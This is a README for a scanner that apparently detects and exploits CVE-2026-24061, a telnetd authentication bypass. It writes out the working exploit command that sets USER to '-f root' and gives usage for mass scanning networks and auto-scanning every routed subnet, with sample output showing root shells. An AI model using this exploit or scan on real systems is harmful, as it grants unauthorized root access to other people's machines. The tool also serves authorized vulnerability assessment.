Telnetd Auth Bypass Scanner (CVE-2026-24061)

A Python-based scanner for detecting and exploiting the CVE-2026-24061 vulnerability in GNU Inetutils telnetd services. This tool scans IP addresses or networks for vulnerable telnetd services that allow authentication bypass leading to root shell access.

---

⚠️ IMPORTANT LEGAL NOTICE AND DISCLAIMER

THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

1. Educational Purpose

This application has been developed solely for educational purposes to demonstrate security vulnerabilities and to assist in authorized security testing and research.

2. No Warranty

THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. THE AUTHORS AND CONTRIBUTORS DO NOT GUARANTEE THAT THE SOFTWARE WILL BE ERROR-FREE, SECURE, OR FUNCTIONAL. The software may contain bugs, errors, or other defects.

3. User Responsibility

ALL RESPONSIBILITY AND LIABILITY FOR THE USE OF THIS SOFTWARE RESTS ENTIRELY WITH THE USER. The authors, contributors, and distributors of this software shall not be held liable for any damages, losses, or legal consequences resulting from the use, misuse, or inability to use this software.

4. Unauthorized Use Prohibited

This tool must ONLY be used on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and may result in criminal prosecution.

5. No Guarantees

The authors do NOT guarantee:

• The accuracy of scan results
• The security of the application itself
• Compatibility with all systems
• Absence of bugs or errors
• Any specific functionality or performance

By using this software, you acknowledge that you have read, understood, and agree to be bound by these terms. If you do not agree, do not use this software.

---

Developer

Developed by: Cuma KURT
Email: cumakurt@gmail.com
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

Vulnerability Information

CVE-2026-24061: GNU Inetutils telnetd through version 2.7 allows remote authentication bypass via a -f root value for the USER environment variable.

CVSS Score: 9.8 (Critical)

Reference: NVD CVE-2026-24061

Features

• 🔍 Port Scanning: Detects open telnet ports (default: 23, customizable)
• 🎯 Vulnerability Detection: Tests for CVE-2026-24061 exploitability
• ⚡ Multi-threaded: Fast concurrent scanning with configurable thread count
• 📁 Flexible Input: Supports IP addresses, CIDR networks, and file-based target lists
• 🗺️ Auto-Detection: Automatically detect and scan subnets from routing table
• 🛑 Safe Interrupt: Ctrl+C safely stops scan and shows partial results
• 📊 Real-time Progress: Progress bar with statistics and findings

Installation

Prerequisites

• Python 3.6 or higher
• telnet client (usually pre-installed on Linux/macOS)

Install Dependencies

pip3 install -r requirements.txt

Note: Most dependencies are part of Python standard library. The tool works out of the box with Python 3.6+.

Usage

Basic Usage

# Scan a single IP address
python3 tscan.py 192.168.1.1

# Scan a CIDR network
python3 tscan.py 192.168.1.0/24

# Scan with custom port
python3 tscan.py -p 2323 192.168.1.1

# Scan targets from a file
python3 tscan.py targets.txt

# Scan multiple IP addresses
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Scan multiple CIDR networks
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

Performance Tuning

# Increase thread count for faster scanning (100 threads)
python3 tscan.py -t 100 192.168.1.0/24

# Increase timeout for slow networks
python3 tscan.py --timeout 10 192.168.1.0/24

# Combine both for large network scans
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

Auto-Detection Mode

# Automatically detect and scan all subnets from system routing table
python3 tscan.py --auto
# or use short form:
python3 tscan.py -a

# Auto-detect with custom port
python3 tscan.py --auto -p 2323
# or:
python3 tscan.py -a -p 2323

# Auto-detect with high thread count
python3 tscan.py --auto -t 200
# or:
python3 tscan.py -a -t 200

Note: --auto mode reads the system routing table using ip route list or route -n command and automatically scans all detected subnets.

Real-World Examples

# Example 1: Quick scan of local network
python3 tscan.py 192.168.1.0/24

# Example 2: Fast scan with high concurrency
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Example 3: Scan non-standard telnet port
python3 tscan.py -p 2323 192.168.1.0/24

# Example 4: Auto-detect and scan all local network subnets
python3 tscan.py --auto
# or:
python3 tscan.py -a

# Example 5: Auto-detect with custom settings
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# or:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

Command Line Options

positional arguments:
  targets               IP address(es), CIDR network(s), or file path(s) containing targets

options:
  -h, --help            show this help message and exit
  -p, --port PORT       Telnet port to scan (default: 23)
  -t, --threads THREADS Number of concurrent threads (default: 50)
  --timeout TIMEOUT     Connection timeout in seconds (default: 5)
  -v, --verbose         Verbose output
  -a, --auto            Automatically detect and scan all subnets from system routing table (route -n or ip route list)

Input File Format

Create a text file with one target per line:

192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

Lines starting with # are treated as comments and ignored.

Output

The tool provides:

1. Real-time Progress: Shows results as they are discovered

   • Progress bar with percentage and statistics
   • Vulnerable host count displayed in progress bar
   • [!] - Vulnerable host
   • [~] - Port open but not vulnerable
   • Port closed targets are silently skipped
   • Ctrl+C (KeyboardInterrupt): Safely interrupts scan and shows partial results immediately

2. Summary Report: Includes:

   • Total telnet services found
   • Number of vulnerable hosts
   • Detailed list of vulnerable hosts

Example Output

Basic Scan Output

[*] Starting scan on 256 target(s)...
[*] Port: 23, Threads: 50, Timeout: 5s

[*] Progress: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Open: 2 | Vulnerable: 1
[!] 192.168.1.100:23 - VULNERABLE
[*] Progress: [████████████████████████████████████] 100.0% (256/256) | Open: 3 | Vulnerable: 1
[+] Scan completed: 256/256 targets scanned

======================================================================
Scan Results Summary
======================================================================

Telnet services found: 3
Vulnerable hosts: 1

[!] VULNERABLE HOSTS:

  ● 192.168.1.100:23
    Output: uid=0(root) gid=0(root) groups=0(root)...

[~] Telnet services found but not vulnerable:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Scan completed in 12.34 seconds

How It Works

1. Port Detection: Checks if telnet port is open on target IPs
2. Exploit Attempt: For open ports, attempts the CVE-2026-24061 exploit:
   • Sets USER="-f root" environment variable
   • Connects via telnet -a command
   • Sends test commands to verify root shell access
3. Result Classification: Categorizes results as vulnerable or not vulnerable

Exploit Details

The vulnerability allows authentication bypass by setting the USER environment variable to -f root:

USER="-f root" telnet -a TARGET_IP [PORT]

This causes telnetd to interpret the USER variable as a flag, bypassing authentication and granting root access.

Limitations

• Requires telnet client to be installed
• Only works against vulnerable telnetd versions (≤ 2.7)
• Auto-detection mode requires ip route list or route -n command

Troubleshooting

"telnet command not found"

Install telnet client:

# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Usually pre-installed

No results found

• Verify targets are reachable
• Check firewall rules
• Ensure telnet services are actually running
• Try increasing timeout: --timeout 10

Legal and Ethical Use

This tool is intended for:

• ✅ Authorized penetration testing
• ✅ Security research on your own systems
• ✅ Vulnerability assessment with proper authorization
• ✅ Educational purposes in controlled environments

DO NOT use this tool for:

• ❌ Unauthorized access to systems
• ❌ Illegal hacking activities
• ❌ Any activity without explicit permission

References

• CVE-2026-24061 Details
• SafeBreach Labs Analysis

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see https://www.gnu.org/licenses/.

Full License Text

See LICENSE file for the complete GNU General Public License v3.0 text.

Disclaimer

THE AUTHORS AND CONTRIBUTORS ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS TOOL.

This tool is provided FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

USE AT YOUR OWN RISK. All responsibility and liability for the use of this software rests entirely with the user. The authors do not guarantee the accuracy, security, or functionality of this software. The software is provided "AS IS" without any warranty of any kind.

This application has been developed solely for educational purposes. By using this software, you acknowledge that:

• You understand this is an educational tool
• All responsibility for its use is yours
• The authors provide no guarantees or warranties
• You will only use it on systems you own or have explicit written permission to test
• Unauthorized use is illegal and may result in criminal prosecution

If you do not agree to these terms, DO NOT USE THIS SOFTWARE.